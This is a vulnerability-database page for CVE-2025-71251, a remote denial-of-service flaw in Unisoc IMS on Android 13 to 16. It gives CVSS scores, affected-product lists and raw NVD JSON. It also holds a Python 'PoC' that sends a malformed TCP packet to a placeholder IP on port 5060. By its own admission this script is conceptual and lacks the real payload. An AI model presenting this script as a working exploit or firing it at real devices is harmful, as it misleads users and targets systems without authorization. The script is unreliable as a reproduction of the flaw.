Security Vulnerability Report
中文
CVE-2025-71251 CVSS 7.5 HIGH

CVE-2025-71251

Published: 2026-05-06 02:16:03
Last Modified: 2026-05-11 15:13:47
Source: [email protected]

Description

In IMS, there is a possible system crash due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:16.0:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:unisoc:sc7731e:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:unisoc:sc9832e:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:unisoc:sc9863a:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:unisoc:t310:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:unisoc:t610:-:*:*:*:*:*:*:* - NOT VULNERABLE
具体受影响版本请参考Unisoc官方安全公告

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket # PoC for CVE-2025-71251 (Conceptual) # Target: Unisoc IMS Service # Note: Actual payload requires specific reverse engineering of the IMS implementation. def send_malicious_packet(target_ip, target_port): try: # Constructing a malformed packet header (example) payload = b"\x00\x01\x02\x03" + b"\x41" * 100 print(f"[*] Sending payload to {target_ip}:{target_port}") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(5) s.connect((target_ip, target_port)) s.send(payload) s.close() print("[+] Payload sent successfully.") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": # Replace with actual target IP and Port used by IMS send_malicious_packet("192.168.1.100", 5060)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-71251", "sourceIdentifier": "[email protected]", "published": "2026-05-06T02:16:03.400", "lastModified": "2026-05-11T15:13:47.117", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In IMS, there is a possible system crash due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "matchCriteriaId": "879FFD0C-9B38-4CAA-B057-1086D794D469"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "matchCriteriaId": "2700BCC5-634D-4EC6-AB67-5B678D5F951D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "8538774C-906D-4B03-A3E7-FA7A55E0DA9E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:16.0:-:*:*:*:*:*:*", "matchCriteriaId": "02882AB1-7993-47DD-84A0-8DF4272D85ED"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:sc7731e:-:*:*:*:*:*:*:*", "matchCriteriaId": "AC867249-B767-4802-868D-6D0E356C8294"}, {"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:sc9832e:-:*:*:*:*:*:*:*", "matchCriteriaId": "25BBD3C5-E87C-4730-970C-19DF855AC3A2"}, {"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:sc9863a:-:*:*:*:*:*:*:*", "matchCriteriaId": "DE00DFDE-97DD-4D33-B580-73FEF677C71B"}, {"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:t310:-:*:*:*:*:*:*:*", "matchCriteriaId": "F20E00D8-2F00-4FA3-9455-37DC89908D96"}, {"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:t610:-:*:*:*:*:*:*:*", "matchCriteriaId": "CDC980D6-B797-4AE1-B553-35395AE80D07"}, {"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:t618:-:*:*:*:*:*:*:*", "matchCriteriaId": "39002ECE-636A-4FEB-9A0B-8127E8AAC844"}, {"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:t7200:-:*:*:*:*:*:*:*", "matchCriteriaId": "814A8ADD-9AFB-43AD-A341-E6475F4150ED"}, {"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:t7225:-:*:*:*:*:*:*:*", "matchCriteriaId": "02739649-98EC-45CC-8CF4-404A55FAE398"}, {"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:t7250:-:*:*:*:*:*:*:*", "matchCriteriaId": "855F9E13-B4E4-4E74-85C2-F6F9EF4DA916"}, {"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:t7255:-:*:*:*:*:*:*:*", "matchCriteriaId": "E51D591C-58C5-4F75-B631-58275E3F5776"}, {"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:t7280:-:*:*:*:*:*:*:*", "matchCriteriaId": "1B0FDCBD-BC38-4C7E-94ED-29F5EA852F39"}, {"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:t7300:-:*:*:*:*:*:*:*", "matchCriteriaId": "04D97A60-C848-4948-A84D-80332B1D5BBA"}, {"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:t8100:-:*:*:*:*:*:*:*", "matchCriteriaId": "F2DA04F2-5351-4043-A330-5397E627A222"}, {"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:t8200:-:*:*:*:*:*:*:*", "matchCriteriaId": "FC033D2C-ED1A-4EAB-A77B-8E1C88C74B0A"}, {"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:t8300:-:*:*:*:*:*:*:*", "matchCriteriaId": "DC7743D5-B187-48D4-BC77-D8DCDF263166"}, {"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:t9100:-:*:*:*:*:*:*:*", "matchCriteriaId": "9D1F3B9D-142F-4E70-8477-E26D921EF19A"}]}]}], "references": [{"url": "https://www.unisoc.com/en/support/product-security-bulletin/2051836844671422466", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.